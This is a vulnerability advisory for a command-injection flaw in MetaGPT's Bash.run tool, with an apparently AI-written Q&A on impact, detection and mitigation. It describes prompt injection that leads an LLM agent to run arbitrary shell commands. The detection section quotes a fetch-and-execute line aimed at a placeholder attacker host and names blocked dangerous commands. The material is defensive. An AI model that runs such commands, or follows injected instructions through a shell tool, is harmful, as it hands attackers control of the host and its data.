CVE-2026-5974
Remote OS Command Injection in FoundationAgents MetaGPT Bash.run Function
Publication date: 2026-04-09
Last updated on: 2026-04-29
Assigner: VulDB
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| deepwisdom | metagpt | up to and including 0.8.1 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5974 is a critical remote code execution vulnerability in the MetaGPT project, specifically in the Bash.run() method of the Bash class located in metagpt/tools/libs/terminal.py.
This method executes bash commands asynchronously by writing them directly to a persistent bash process without proper input validation or security restrictions.
Because the Bash.run() method is exposed to large language model (LLM) agents, an attacker can use prompt injection to make the LLM run arbitrary and potentially malicious bash commands on the host system.
This vulnerability allows attackers to execute arbitrary commands remotely, leading to full system compromise.
How can this vulnerability impact me?
The vulnerability allows an attacker to remotely execute arbitrary bash commands on the affected system. Possible consequences include:
- Full system compromise, including unauthorized access and control.
- Data exfiltration by reading or copying sensitive information.
- Lateral movement within the network to compromise other systems.
- Persistence through installation of backdoors or malicious scripts.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves remote command injection via the Bash.run() method in the MetaGPT project, which allows execution of arbitrary bash commands without security restrictions.
Detection can focus on monitoring for suspicious or unexpected bash commands being executed, especially those involving command injection patterns such as use of shell metacharacters, command substitution, or dangerous commands like curl, wget, rm -rf, or sudo.
Suggested detection commands include monitoring process activity and command execution logs for unusual commands or patterns. For example:
- Use auditd or similar Linux auditing tools to track execution of bash commands: `auditctl -w /bin/bash -p x -k bash_exec`
- Check for suspicious files created by injected commands, e.g., `ls -l /tmp/bash_tool_rce_proof.txt` as seen in the proof-of-concept.
- Monitor network connections for unexpected outbound requests that could indicate command injection attempts, e.g., `netstat -tunp` or `ss -tunp`.
- Search logs or command history for suspicious commands like `curl attacker.com/shell | bash`.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include removing or disabling the exposure of the vulnerable Bash.run() method to LLM agents, so that agent output can no longer reach a shell.
Implement strict input validation and allowlists for permitted commands to block dangerous commands and shell metacharacters.
Use sandboxed or containerized environments (e.g., Docker, nsjail) to isolate command execution and limit potential damage.
Require human approval before executing any shell commands generated by LLMs.
Apply patches or updates once available that introduce safe command allowlists and validation, as described in the security fix which blocks commands like curl, wget, rm -rf, sudo, and shell metacharacters.
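The allowlist, metacharacter-blocking and human-approval steps above can be combined into one gate in front of any agent-facing command tool. The following is an added Python sketch, not MetaGPT's code or its security fix; `ALLOWED_PROGRAMS`, `validate_command`, `is_allowed`, `run_validated` and the `approve` callback are hypothetical names, and the allowlist contents are an assumption.

```python
import shlex
import subprocess

# Assumption: the only programs this agent legitimately needs (deny by default).
ALLOWED_PROGRAMS = {"ls", "cat", "grep", "echo", "pwd"}
# Characters that let one string carry a second command, a substitution or a redirect.
SHELL_METACHARS = set(";&|`$<>(){}\n\\")


class CommandRejected(ValueError):
    """Raised when an LLM-proposed command fails validation or approval."""


def validate_command(command: str) -> list[str]:
    """Return an argv list for an allowed command, or raise CommandRejected."""
    bad = SHELL_METACHARS.intersection(command)
    if bad:
        raise CommandRejected(f"shell metacharacters not permitted: {sorted(bad)}")
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # e.g. unbalanced quotes
        raise CommandRejected(f"unparseable command: {exc}") from exc
    if not argv:
        raise CommandRejected("empty command")
    # Bare names only: "/tmp/ls" or "./ls" is not in the set and is rejected.
    if argv[0] not in ALLOWED_PROGRAMS:
        raise CommandRejected(f"program not on allowlist: {argv[0]!r}")
    return argv


def is_allowed(command: str) -> bool:
    """Boolean form of validate_command, convenient for logging and tests."""
    try:
        validate_command(command)
        return True
    except CommandRejected:
        return False


def run_validated(command: str, approve=lambda argv: False, timeout: int = 10) -> str:
    """Validate, ask the operator, then execute without a shell."""
    argv = validate_command(command)
    if not approve(argv):  # default callback refuses: approval must be explicit
        raise CommandRejected("operator did not approve")
    # shell=False passes argv straight to exec, so nothing re-parses the string.
    done = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=timeout)
    return done.stdout
```

A program allowlist does not constrain arguments (`cat` can still read any file the process can), so this gate belongs inside the sandbox or container described above, not in place of it.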
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability in FoundationAgents MetaGPT allows remote code execution through command injection, which can lead to full system compromise, data exfiltration, lateral movement, and persistence through backdoors.
Such impacts can negatively affect compliance with common standards and regulations like GDPR and HIPAA, which require protection of sensitive data and systems against unauthorized access and breaches.
Specifically, unauthorized remote code execution and potential data exfiltration violate principles of data confidentiality, integrity, and availability mandated by these regulations.
Therefore, exploitation of this vulnerability could lead to non-compliance with these standards, resulting in legal and financial consequences.